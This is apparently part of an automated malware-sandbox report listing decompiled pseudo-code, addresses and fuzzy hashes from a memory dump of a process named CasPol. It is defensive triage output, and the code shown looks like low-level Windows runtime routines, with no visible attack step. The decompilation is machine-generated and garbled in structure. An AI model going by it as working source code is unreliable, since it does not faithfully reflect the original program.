                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t109 =  *0x1817b9c; // 0x0
                                                                                                                                                                                                                                                                                                				_t124 = L01744620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                                                                                                                                                                                                                                				if(_t124 != 0) {
                                                                                                                                                                                                                                                                                                					 *_t124 =  *_t124 & 0x00000000;
                                                                                                                                                                                                                                                                                                					_t124[1] = _t124[1] & 0x00000000;
                                                                                                                                                                                                                                                                                                					_t124[4] = _t124[4] & 0x00000000;
                                                                                                                                                                                                                                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                                                                						_push(_t124);
                                                                                                                                                                                                                                                                                                						if((_t106 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                                							_push(0x200);
                                                                                                                                                                                                                                                                                                							_push(0x28);
                                                                                                                                                                                                                                                                                                							_push(0xffffffff);
                                                                                                                                                                                                                                                                                                							_t122 = E01769800();
                                                                                                                                                                                                                                                                                                							if(_t122 < 0) {
                                                                                                                                                                                                                                                                                                								L33:
                                                                                                                                                                                                                                                                                                								if((_t124[4] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                									_push(4);
                                                                                                                                                                                                                                                                                                									_t64 =  &(_t124[1]); // 0x4
                                                                                                                                                                                                                                                                                                									_t107 = _t64;
                                                                                                                                                                                                                                                                                                									_push(_t107);
                                                                                                                                                                                                                                                                                                									_push(5);
                                                                                                                                                                                                                                                                                                									_push(0xfffffffe);
                                                                                                                                                                                                                                                                                                									L017695B0();
                                                                                                                                                                                                                                                                                                									if( *_t107 != 0) {
                                                                                                                                                                                                                                                                                                										_push( *_t107);
                                                                                                                                                                                                                                                                                                										E017695D0();
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_push(_t124);
                                                                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                                                                                                                                                                                                                								L37:
                                                                                                                                                                                                                                                                                                								L017477F0();
                                                                                                                                                                                                                                                                                                								return _t122;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t124[4] = _t124[4] | 0x00000002;
                                                                                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                                                                                							_t108 = _a8;
                                                                                                                                                                                                                                                                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                                                                                                                                                                                                                                                                							_t80 = _t29;
                                                                                                                                                                                                                                                                                                							_t30 =  &(_t124[5]); // 0x14
                                                                                                                                                                                                                                                                                                							_t124[3] = _t80;
                                                                                                                                                                                                                                                                                                							_t123 = 0;
                                                                                                                                                                                                                                                                                                							_t124[2] = _t30;
                                                                                                                                                                                                                                                                                                							 *_t80 = _t108;
                                                                                                                                                                                                                                                                                                							if(_t108 == 0) {
                                                                                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                                                                                								_t112 = 0x400;
                                                                                                                                                                                                                                                                                                								_push( &_v8);
                                                                                                                                                                                                                                                                                                								_v8 = 0x400;
                                                                                                                                                                                                                                                                                                								_push(_t124[2]);
                                                                                                                                                                                                                                                                                                								_push(0x400);
                                                                                                                                                                                                                                                                                                								_push(_t124[3]);
                                                                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                                                                								_push( *_t124);
                                                                                                                                                                                                                                                                                                								_t122 = E01769910();
                                                                                                                                                                                                                                                                                                								if(_t122 != 0xc0000023) {
                                                                                                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                                                                                                									if(_t122 != 0x106) {
                                                                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                                                                										if(_t122 < 0) {
                                                                                                                                                                                                                                                                                                											L29:
                                                                                                                                                                                                                                                                                                											_t83 = _t124[2];
                                                                                                                                                                                                                                                                                                											if(_t83 != 0) {
                                                                                                                                                                                                                                                                                                												_t59 =  &(_t124[5]); // 0x14
                                                                                                                                                                                                                                                                                                												if(_t83 != _t59) {
                                                                                                                                                                                                                                                                                                													L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											_push( *_t124);
                                                                                                                                                                                                                                                                                                											E017695D0();
                                                                                                                                                                                                                                                                                                											goto L33;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										 *_a16 = _t124;
                                                                                                                                                                                                                                                                                                										return 0;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									if(_t108 != 1) {
                                                                                                                                                                                                                                                                                                										_t122 = 0;
                                                                                                                                                                                                                                                                                                										goto L40;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t122 = 0xc0000061;
                                                                                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									goto L22;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                                                                                									L22:
                                                                                                                                                                                                                                                                                                									_t89 =  *0x1817b9c; // 0x0
                                                                                                                                                                                                                                                                                                									_t92 = L01744620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                                                                                                                                                                                                                                									_t124[2] = _t92;
                                                                                                                                                                                                                                                                                                									if(_t92 == 0) {
                                                                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t112 =  &_v8;
                                                                                                                                                                                                                                                                                                									_push( &_v8);
                                                                                                                                                                                                                                                                                                									_push(_t92);
                                                                                                                                                                                                                                                                                                									_push(_v8);
                                                                                                                                                                                                                                                                                                									_push(_t124[3]);
                                                                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                                                                									_push( *_t124);
                                                                                                                                                                                                                                                                                                									_t122 = E01769910();
                                                                                                                                                                                                                                                                                                									if(_t122 != 0xc0000023) {
                                                                                                                                                                                                                                                                                                										goto L26;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t122 = 0xc0000017;
                                                                                                                                                                                                                                                                                                								goto L26;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t119 = 0;
                                                                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                                                                								_t114 = _t124[3];
                                                                                                                                                                                                                                                                                                								_t119 = _t119 + 0xc;
                                                                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                                                                                                                                                                                                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                								_t123 = _t123 + 1;
                                                                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                                                                                                                                                                                                                                							} while (_t123 < _t108);
                                                                                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_push(0x28);
                                                                                                                                                                                                                                                                                                						_push(3);
                                                                                                                                                                                                                                                                                                						_t122 = L0172A7B0();
                                                                                                                                                                                                                                                                                                						if(_t122 < 0) {
                                                                                                                                                                                                                                                                                                							goto L33;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if((_t106 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                						_t115 = 0x28;
                                                                                                                                                                                                                                                                                                						_t122 = L017BE7D3(_t115, _t124);
                                                                                                                                                                                                                                                                                                						if(_t122 < 0) {
                                                                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                                                                							_push(_t124);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                                                                                                                                                                                                                							goto L37;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                                                                						if( *_t124 != 0) {
                                                                                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t15 =  &(_t124[1]); // 0x4
                                                                                                                                                                                                                                                                                                					_t117 = 4;
                                                                                                                                                                                                                                                                                                					_t122 = L017BE7D3(_t117, _t15);
                                                                                                                                                                                                                                                                                                					if(_t122 >= 0) {
                                                                                                                                                                                                                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                                                                                                                                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                                						_push(4);
                                                                                                                                                                                                                                                                                                						_push( &_v12);
                                                                                                                                                                                                                                                                                                						_push(5);
                                                                                                                                                                                                                                                                                                						_push(0xfffffffe);
                                                                                                                                                                                                                                                                                                						L017695B0();
                                                                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					return 0xc0000017;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                                                0x017bbb01
                                                                                                                                                                                                                                                                                                0x017bbb01
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb06
                                                                                                                                                                                                                                                                                                0x017bb9d7
                                                                                                                                                                                                                                                                                                0x017bb9db
                                                                                                                                                                                                                                                                                                0x017bb9db
                                                                                                                                                                                                                                                                                                0x017bb9de
                                                                                                                                                                                                                                                                                                0x017bb9de
                                                                                                                                                                                                                                                                                                0x017bb9e4
                                                                                                                                                                                                                                                                                                0x017bb9e7
                                                                                                                                                                                                                                                                                                0x017bb9ea
                                                                                                                                                                                                                                                                                                0x017bb9ec
                                                                                                                                                                                                                                                                                                0x017bb9ef
                                                                                                                                                                                                                                                                                                0x017bb9f3
                                                                                                                                                                                                                                                                                                0x017bba1b
                                                                                                                                                                                                                                                                                                0x017bba1b
                                                                                                                                                                                                                                                                                                0x017bba23
                                                                                                                                                                                                                                                                                                0x017bba24
                                                                                                                                                                                                                                                                                                0x017bba27
                                                                                                                                                                                                                                                                                                0x017bba2a
                                                                                                                                                                                                                                                                                                0x017bba2b
                                                                                                                                                                                                                                                                                                0x017bba2e
                                                                                                                                                                                                                                                                                                0x017bba30
                                                                                                                                                                                                                                                                                                0x017bba37
                                                                                                                                                                                                                                                                                                0x017bba3f
                                                                                                                                                                                                                                                                                                0x017bba9c
                                                                                                                                                                                                                                                                                                0x017bbaa2
                                                                                                                                                                                                                                                                                                0x017bbb13
                                                                                                                                                                                                                                                                                                0x017bbb15
                                                                                                                                                                                                                                                                                                0x017bbaae
                                                                                                                                                                                                                                                                                                0x017bbaae
                                                                                                                                                                                                                                                                                                0x017bbab3
                                                                                                                                                                                                                                                                                                0x017bbab5
                                                                                                                                                                                                                                                                                                0x017bbaba
                                                                                                                                                                                                                                                                                                0x017bbac8
                                                                                                                                                                                                                                                                                                0x017bbac8
                                                                                                                                                                                                                                                                                                0x017bbaba
                                                                                                                                                                                                                                                                                                0x017bbacd
                                                                                                                                                                                                                                                                                                0x017bbacf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbacf
                                                                                                                                                                                                                                                                                                0x017bbb1a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb1c
                                                                                                                                                                                                                                                                                                0x017bbaa7
                                                                                                                                                                                                                                                                                                0x017bbb11
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb11
                                                                                                                                                                                                                                                                                                0x017bbaa9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba58
                                                                                                                                                                                                                                                                                                0x017bba5d
                                                                                                                                                                                                                                                                                                0x017bba62
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba64
                                                                                                                                                                                                                                                                                                0x017bba67
                                                                                                                                                                                                                                                                                                0x017bba68
                                                                                                                                                                                                                                                                                                0x017bba69
                                                                                                                                                                                                                                                                                                0x017bba6c
                                                                                                                                                                                                                                                                                                0x017bba6f
                                                                                                                                                                                                                                                                                                0x017bba71
                                                                                                                                                                                                                                                                                                0x017bba78
                                                                                                                                                                                                                                                                                                0x017bba80
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba90
                                                                                                                                                                                                                                                                                                0x017bba90
                                                                                                                                                                                                                                                                                                0x017bba97
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba97
                                                                                                                                                                                                                                                                                                0x017bb9f5
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9fa
                                                                                                                                                                                                                                                                                                0x017bba03
                                                                                                                                                                                                                                                                                                0x017bba07
                                                                                                                                                                                                                                                                                                0x017bba0c
                                                                                                                                                                                                                                                                                                0x017bba10
                                                                                                                                                                                                                                                                                                0x017bba17
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9a6
                                                                                                                                                                                                                                                                                                0x017bb9a8
                                                                                                                                                                                                                                                                                                0x017bb9af
                                                                                                                                                                                                                                                                                                0x017bb9b3
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 91270d091ecde4adc862b933ef8b4ebd9f5db57991aec037feac4602b868ecff
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b9b8f43aaf3c31fb3bb948d16c2d283af88d7f0af41d39d8bffb3f13ae13c4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91270d091ecde4adc862b933ef8b4ebd9f5db57991aec037feac4602b868ecff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6771E232640702EFE732DF28CC89F96FBE5EB44720F144928EA55876A1DB75EA44CB50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E017252A5(char __ecx) {
                                                                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                                                                				char _v29;
                                                                                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                                                                                				void* _v37;
                                                                                                                                                                                                                                                                                                				void* _v38;
                                                                                                                                                                                                                                                                                                				void* _v40;
                                                                                                                                                                                                                                                                                                				void* _v46;
                                                                                                                                                                                                                                                                                                				void* _v64;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                                                                				short _t85;
                                                                                                                                                                                                                                                                                                				signed int _t87;
                                                                                                                                                                                                                                                                                                				signed int _t88;
                                                                                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t102;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t104;
                                                                                                                                                                                                                                                                                                				signed int _t106;
                                                                                                                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t93 = __ecx;
                                                                                                                                                                                                                                                                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                                                				_push(_t88);
                                                                                                                                                                                                                                                                                                				_v29 = __ecx;
                                                                                                                                                                                                                                                                                                				_t89 = _t88 | 0xffffffff;
                                                                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                                                                					L0173EEF0(0x18179a0);
                                                                                                                                                                                                                                                                                                					_t104 =  *0x1818210; // 0x1162e68
                                                                                                                                                                                                                                                                                                					if(_t104 == 0) {
                                                                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					asm("lock inc dword [esi]");
                                                                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                                                                                                                                                                                                                                                					E0173EB70(_t93, 0x18179a0);
                                                                                                                                                                                                                                                                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                                                                                                                                                                                                                                						_t101 =  *0x7ffe02dc;
                                                                                                                                                                                                                                                                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                                                                                                                                                                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0x90028);
                                                                                                                                                                                                                                                                                                							_push(_t108 + 0x20);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                                                                                                                                                                                							_t53 = E01769890();
                                                                                                                                                                                                                                                                                                							__eflags = _t53;
                                                                                                                                                                                                                                                                                                							if(_t53 >= 0) {
                                                                                                                                                                                                                                                                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                                                                                                                                                                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                									L0173EEF0(0x18179a0);
                                                                                                                                                                                                                                                                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                                                                                                                                                                                                                                									E0173EB70(0, 0x18179a0);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags = _t53 - 0xc0000012;
                                                                                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                                                                                								_t13 = _t104 + 0xc; // 0x1162e75
                                                                                                                                                                                                                                                                                                								_t93 = _t13;
                                                                                                                                                                                                                                                                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                                                                                                                                                                                                                                                                								__eflags = E0175F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                                                                                                                                                                                                                								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                                									L15:
                                                                                                                                                                                                                                                                                                									_t102 = _v28;
                                                                                                                                                                                                                                                                                                									 *_t102 = 2;
                                                                                                                                                                                                                                                                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                                                                                                                                                                                                									L0173EEF0(0x18179a0);
                                                                                                                                                                                                                                                                                                									__eflags =  *0x1818210 - _t104; // 0x1162e68
                                                                                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                                                                                                                                                                                                                                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                                                                                                                                                                                                										 *0x1818210 = _t102;
                                                                                                                                                                                                                                                                                                										_t32 = _t102 + 0xc; // 0x0
                                                                                                                                                                                                                                                                                                										 *_t95 =  *_t32;
                                                                                                                                                                                                                                                                                                										_t33 = _t102 + 0x10; // 0x0
                                                                                                                                                                                                                                                                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                                                                                                                                                                                                                                										_t35 = _t102 + 4; // 0xffffffff
                                                                                                                                                                                                                                                                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                                                                                                                                                                                                                                                											E017A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										E0173EB70(_t95, 0x18179a0);
                                                                                                                                                                                                                                                                                                										asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                                                                                                                                                                                											E017695D0();
                                                                                                                                                                                                                                                                                                											L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                                                                                                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										asm("lock xadd [esi], ebx");
                                                                                                                                                                                                                                                                                                										__eflags = _t89 == 1;
                                                                                                                                                                                                                                                                                                										if(_t89 == 1) {
                                                                                                                                                                                                                                                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                                                                                                                                                                                											E017695D0();
                                                                                                                                                                                                                                                                                                											L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                                                                                                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										_t49 = _t102;
                                                                                                                                                                                                                                                                                                										L4:
                                                                                                                                                                                                                                                                                                										return _t49;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									E0173EB70(_t93, 0x18179a0);
                                                                                                                                                                                                                                                                                                									asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                                                                                                                                                                                										E017695D0();
                                                                                                                                                                                                                                                                                                										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                                                                                                                                                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									 *_t102 = 1;
                                                                                                                                                                                                                                                                                                									asm("lock xadd [edi], eax");
                                                                                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                										_t28 = _t102 + 4; // 0xffffffff
                                                                                                                                                                                                                                                                                                										_push( *_t28);
                                                                                                                                                                                                                                                                                                										E017695D0();
                                                                                                                                                                                                                                                                                                										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t93 =  &_v20;
                                                                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                                                                                                                                                                                                                								_t85 = 6;
                                                                                                                                                                                                                                                                                                								_v20 = _t85;
                                                                                                                                                                                                                                                                                                								_t87 = E0175F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                                                                                                                                                                                                                								__eflags = _t87;
                                                                                                                                                                                                                                                                                                								if(_t87 < 0) {
                                                                                                                                                                                                                                                                                                									goto L3;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                                                                                                                                                                                                                                                                								goto L15;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags = _t53 - 0xc000026e;
                                                                                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                                                                                                                                                                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                                                					_t49 = _t104;
                                                                                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t49 = 0;
                                                                                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                                                                0x01780e3a
                                                                                                                                                                                                                                                                                                0x01780e3f
                                                                                                                                                                                                                                                                                                0x01780e41
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780e47
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780e47
                                                                                                                                                                                                                                                                                                0x01780df9
                                                                                                                                                                                                                                                                                                0x01780dfe
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780dfe
                                                                                                                                                                                                                                                                                                0x01725303
                                                                                                                                                                                                                                                                                                0x01725307
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01725309
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01725309
                                                                                                                                                                                                                                                                                                0x01725307
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x0172530e
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c74e8a3606683d63f5bde8c68e06cf4cea0f025496f2f75b7c1fc76994c1f537
                                                                                                                                                                                                                                                                                                • Instruction ID: 84faab450b12730e90aa66159f33ddfc997265d8a0c816e04d49f09328b35bd2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74e8a3606683d63f5bde8c68e06cf4cea0f025496f2f75b7c1fc76994c1f537
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A651CC71245342ABD322EF28C844B67FBE8FF94710F14091EF59587692E774E849CBA2
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E01754D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				char _v176;
                                                                                                                                                                                                                                                                                                				char _v177;
